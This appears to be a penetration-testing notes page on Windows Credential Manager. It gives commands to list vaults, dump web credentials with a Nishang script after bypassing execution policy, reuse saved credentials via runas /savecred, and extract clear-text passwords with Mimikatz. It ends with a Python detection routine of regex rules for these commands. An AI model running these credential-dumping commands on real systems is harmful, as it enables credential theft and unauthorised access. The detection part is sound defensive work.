
Windows Credential Manager

Credential Manager is a Windows Feature that stores Logon-Sensitive Information for Websites, Applications, and Networks. It contains Login Credentials such as Usernames, Passwords, and Internet Addresses.


  • Web Credentials contain Authentication Details stored in Internet Browsers or other Applications.
  • Windows Credentials contain Windows Authentication Details, such as NTLM or Kerberos.
  • Generic Credentials contain Basic Authentication Details, such as Clear-Text Usernames and Passwords.
  • Certificate-Based Credentials contain Authentication Details based on Certificates.

Info

Authentication Details are stored in the User's Folder and are not Shared among Windows User Accounts. However, they are Cached in Memory.


Accessing Credential Manager

Info

In most cases VaultCmd is Not going to show the Stored Passwords.


We can access the Windows Credential Manager through the GUI (Control Panel -> User Accounts -> Credential Manager) or the Command Prompt.

We can use the Microsoft Credentials Manager vaultcmd Utility. By default, Windows has two Vaults, one for Web Credentials and the other one for Windows Machine Credentials.

:: List Available Vaults
vaultcmd /list

:: List the Properties of a Vault
vaultcmd /listproperties:"Vault Name"

:: List the Credentials Stored in a Vault
vaultcmd /listcreds:"Vault Name"

Credential Dumping

If VaultCmd is not able to show us the Password we can rely on other PowerShell Scripts such as Nishang Get-WebCredentials.ps1.

# Sets the Execution Policy for the Current PowerShell Process only
# [Bypass] Nothing is Blocked and there are no Warnings or Prompts
Set-ExecutionPolicy Bypass -Scope process -Force

# Import the PowerShell Script
Import-Module .\Get-WebCredentials.ps1
Get-WebCredentials


RunAs

An alternative method of taking advantage of stored credentials is by using RunAs. RunAs is a Built-In Command-Line Tool that allows running Windows Applications or Tools under a different User's Permissions.

:: List Saved Credentials
cmdkey /list

:: Using Credentials
runas /savecred /user:<UserName> cmd.exe

:: Run Specific Commands [Password Piping is Not Allowed]
runas /user:<UserName> "cmd /c dir C:\"

Mimikatz

Required Privileges: Administrators

Mimikatz can Dump Clear-Text Passwords stored in the Credential Manager from Memory.

privilege::debug

:: Lists Credential Manager Credentials by targeting the Microsoft Local Security Authority Server DLL [lsasrv.dll]
sekurlsa::credman
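
Detection

The commands on this page leave recognizable strings in process command lines and PowerShell script-block text. The following is an added example, not part of the original notes or of any tool named here: a small triage routine that matches those strings and rates each host/user pair. The event layout, the "text" field, the severity split and the sample hosts and users are assumptions made for illustration.

```python
import re
from collections import defaultdict

# Patterns for the commands shown on this page. Matched case-insensitively
# against process command lines or PowerShell script-block text.
RULES = {
    "vault_enum": re.compile(r"\bvaultcmd(?:\.exe)?\b.*?/list", re.I),
    "cmdkey_list": re.compile(r"\bcmdkey(?:\.exe)?\b.*?/list\b", re.I),
    "runas_savecred": re.compile(r"\brunas(?:\.exe)?\b.*?/savecred\b", re.I),
    "execpolicy_bypass": re.compile(r"\bSet-ExecutionPolicy\b.*?\bBypass\b", re.I),
    "web_cred_script": re.compile(r"\bGet-WebCredentials\b", re.I),
    "credman_from_lsass": re.compile(r"\bsekurlsa::credman\b", re.I),
}
# Rules that indicate credential use or extraction rather than listing.
HIGH = {"runas_savecred", "web_cred_script", "credman_from_lsass"}

def match_rules(text):
    """Return the sorted names of every rule the text triggers."""
    return sorted(name for name, rx in RULES.items() if rx.search(text))

def triage(events):
    """Group hits per (host, user) and rate each group.

    high   = any HIGH rule, or two or more distinct rules from one account
    medium = a single enumeration-style rule
    """
    seen = defaultdict(set)
    for ev in events:
        for rule in match_rules(ev["text"]):
            seen[(ev["host"], ev["user"])].add(rule)
    report = {}
    for key, rules in seen.items():
        level = "high" if rules & HIGH or len(rules) >= 2 else "medium"
        report[key] = (level, sorted(rules))
    return report

# Constructed sample events (hypothetical hosts and users; "text" stands in for
# a command line or script-block field exported from your logging pipeline).
SAMPLE = [
    {"host": "WS01", "user": "alice", "text": r"C:\Windows\System32\cmdkey.exe /list"},
    {"host": "WS01", "user": "alice", "text": r"runas /savecred /user:CORP\svc cmd.exe"},
    {"host": "WS02", "user": "bob", "text": 'vaultcmd /listcreds:"Windows Credentials"'},
    {"host": "WS02", "user": "carol", "text": r'runas /user:CORP\admin "cmd /c dir C:\"'},
    {"host": "WS03", "user": "dave", "text": "Set-ExecutionPolicy Bypass -Scope process -Force"},
]

if __name__ == "__main__":
    for (host, user), (level, rules) in sorted(triage(SAMPLE).items()):
        print(f"{host}\\{user}: {level} {rules}")
```

Commands typed inside an interactive console never reach process-creation logs, so the last rule only fires when the string appears on a command line or in logged script text.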